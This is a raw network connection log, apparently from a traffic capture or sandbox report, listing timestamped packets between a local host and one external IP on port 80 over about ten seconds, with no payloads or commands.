Mar 29, 2024 14:23:53.924913883 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:53.927921057 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:53.927936077 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:53.928006887 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:54.774912119 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:54.774975061 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:54.781445980 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.054435968 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.054471016 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.054528952 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.054549932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.054567099 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.054595947 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.054611921 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.056355000 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.056416988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.056482077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.056500912 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.056572914 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.056646109 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.056654930 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.056723118 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.065604925 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.065659046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.065718889 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.065731049 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.066189051 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.271717072 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.271744013 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.271755934 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.271763086 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.271898031 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.272023916 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.272037983 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.272084951 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.280467033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.282854080 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.501137018 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.501157045 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.501173019 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.501218081 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.501264095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.501288891 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.501311064 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.501341105 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.501379967 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.512762070 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.512814045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.723148108 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.723207951 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.723215103 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.723259926 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.723285913 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.723337889 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.723479986 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.723521948 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.723532915 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.723566055 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.732620955 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.732683897 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.951195002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.951217890 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.951289892 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.951385975 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.951649904 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.951742887 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:55.959686041 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:55.959741116 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:56.166996002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.167150021 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:56.167295933 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.167370081 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.167419910 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:56.175533056 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.175560951 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.175626993 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:56.384283066 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.384305000 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.384319067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.384366989 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:56.384403944 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:56.391396046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.391452074 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:56.391479015 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.391525984 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:56.596575022 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.596627951 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.596642971 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.596715927 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:56.596765995 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:56.604453087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.604526043 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.604594946 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:56.814332008 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.814349890 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.814503908 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:56.814503908 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:56.824397087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.824429035 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.824444056 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:56.824455976 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:56.824482918 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:56.824482918 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.036693096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.036741018 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.036854982 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.047405958 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.047488928 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.047492027 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.047530890 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.047533035 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.047559023 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.047576904 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.047600985 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.256244898 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.256289005 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.256370068 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.256390095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.268392086 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.268450975 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.268610001 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.268662930 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.268708944 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.268752098 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.472764015 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.472834110 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.472841978 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.472893000 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.484534979 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.484582901 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.484595060 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.484641075 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.484807968 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.484862089 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.484883070 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.484921932 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.541551113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.541652918 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.699237108 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.699390888 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.713018894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.713129997 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.767870903 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.767982006 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.917383909 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.917402029 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.917503119 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.930078983 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.930161953 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:57.976896048 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:57.976958990 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:58.130599976 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:58.130717039 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:58.143764019 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:58.143825054 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:58.194469929 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:58.194535971 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:58.360328913 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:58.360440969 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:58.372694016 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:58.372777939 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:58.372786999 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:58.372817039 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:58.424308062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:58.424379110 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:58.578684092 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:58.578743935 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:58.589541912 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:58.589606047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:58.637248993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:58.637270927 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:58.637358904 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:58.637372017 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:58.816730976 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:58.816858053 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:58.867914915 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:58.868004084 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:58.868053913 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:58.868097067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:59.023762941 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:59.023952961 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:59.065475941 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:59.065584898 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:59.224772930 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:59.224839926 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:59.265943050 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:59.266017914 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:59.436546087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:59.436570883 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:59.436620951 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:59.436666965 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:59.473371029 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:59.473431110 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:59.645534039 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:59.645653963 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:59.645675898 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:59.645677090 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:59.645700932 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:59.645714045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:59.679766893 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:59.679830074 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:59.853821039 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:59.853919983 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:59.854058027 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:59.854073048 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:59.854101896 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:59.854124069 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:23:59.887937069 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:23:59.887998104 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:00.065078020 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:00.065095901 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:00.065140963 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:00.065182924 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:00.275444031 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:00.275516987 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:00.285752058 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:00.285767078 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:00.285814047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:00.489196062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:00.489275932 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:00.497962952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:00.498002052 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:00.498007059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:00.498054981 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:00.703959942 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:00.704137087 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:00.713418961 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:00.713501930 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:00.921906948 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:00.921983004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:00.930610895 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:00.930650949 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:00.930689096 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:00.930705070 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:01.133821011 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:01.136324883 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:01.146006107 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:01.146028996 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:01.146043062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:01.146071911 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:01.146105051 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:01.361385107 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:01.361459017 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:01.370170116 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:01.370242119 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:01.370336056 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:01.370349884 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:01.370390892 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:01.591017008 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:01.591083050 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:01.599145889 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:01.599198103 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:01.599364042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:01.599422932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:01.599446058 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:01.599459887 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:01.816916943 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:01.817009926 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:01.824012041 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:01.824259996 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:01.824332952 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:01.824341059 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:01.827677965 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:02.031675100 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:02.031750917 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:02.038574934 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:02.038631916 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:02.038661957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:02.039625883 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:02.258517981 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:02.258537054 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:02.258610010 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:02.266138077 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:02.266735077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:02.466682911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:02.466743946 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:02.478918076 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:02.478981018 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:02.478982925 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:02.479070902 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:02.486452103 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:02.486515999 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:02.692693949 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:02.692749977 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:02.692775965 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:02.692816973 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:02.702485085 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:02.702542067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:02.916874886 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:02.917023897 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:02.917031050 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:02.917077065 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:02.927130938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:02.927185059 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:02.927185059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:02.927232981 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.137183905 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.137216091 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.137245893 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.137275934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.137296915 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.137342930 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.146375895 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.146442890 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.146455050 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.146532059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.350807905 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.350872993 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.351340055 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.351396084 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.351452112 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.351494074 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.359647989 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.359694004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.359725952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.359822989 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.567779064 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.567889929 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.568128109 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.568170071 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.568177938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.571671963 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.577528954 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.577590942 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.577616930 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.577717066 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.794037104 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.794142008 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.798419952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.798464060 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.798538923 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:03.804836988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.804932117 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:03.805082083 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:04.015275955 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.015436888 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:04.018620968 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.018654108 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.018682003 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:04.018719912 CET	49699	80	192.168.2.7	89.238.170.230
